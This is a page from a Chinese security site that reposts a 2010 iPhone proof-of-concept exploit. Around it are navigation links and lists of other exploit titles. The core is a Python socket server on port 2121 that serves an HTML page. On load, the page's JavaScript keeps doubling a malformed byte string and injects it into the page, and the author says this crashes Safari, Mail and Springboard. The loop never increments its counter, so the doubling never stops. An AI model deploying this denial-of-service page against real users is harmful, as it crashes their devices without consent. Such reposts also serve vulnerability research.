首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
iPhone Springboard Malformed Character Crash PoC
来源:vfocus.net 作者:Chase 发布时间:2010-03-16  

#!/usr/bin/python

#iPhone Springboard crash PoC by Chase Higgins. Devices tested: iPhone 2G @ OS 3.1, iPhone 3GS @ 3.1.3
#this script acts as webserver, and causes Safari, as well as Mail and Springboard to crash
#all these apps crash after running this exploit on the iPhone. Unable to debug any of these processes as the gdb on my
#device is acting up, original iPhone is just too low memory to further test this exploit, so I am releasing it

# Exploit Title: iPhone Springboard Malformed Character Crash PoC
# Date: 3/15/2010
# Author: Chase Higgins
# Software Link: apple.com/iphone/
# Version: iPhone 2G, iPhone 3GS
# Tested on: iPhone OS 3.1, and iPhone OS 3.1.3
# CVE :
# Code : none

import sys, socket;

def main():
 html = """
 <html>
 <head>
 <script>
 function triggerCrash(){
  evil_div = document.getElementById('evilDiv');
  var evil_string = "\x4e\x5b\x01";
  i = 0;

  while (i < 1000){
   evil_string = evil_string + evil_string;
  }

  evil_div.innerHTML = evil_string;
 }
 </script>
 </head>
 <body onLoad="triggerCrash()">
 <div id="evilDiv">
 
 </div>
 </body>
 </html>
 """;

 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
 s.bind(('',2121));
 s.listen(1);
 
 while True:
  channel, details = s.accept();
  print channel.recv(1024);
  channel.send(html);
  channel.close();
 
main();


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ArGoSoft FTP Server .NET v.1.0
·Microsoft Virtual PC Hyperviso
·QuickZip 4.60.019 Stack BOF -
·WFTPD 3.3 Remote REST DoS
·# SWINGETTE 1.1 (.mp3) Buffer
·Windisc Stack BOF exploit
·Liquid XML Studio 2010 <= v8.0
·Oracle XDB FTP service UNLOCK
·Open & Compact FTPd 1.2 Pre-Au
·arp_sniff.c
·PhpMyLogon v2 SQL Injection Vu
·Linux Kernel 'net/ipv6/ip6_out
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved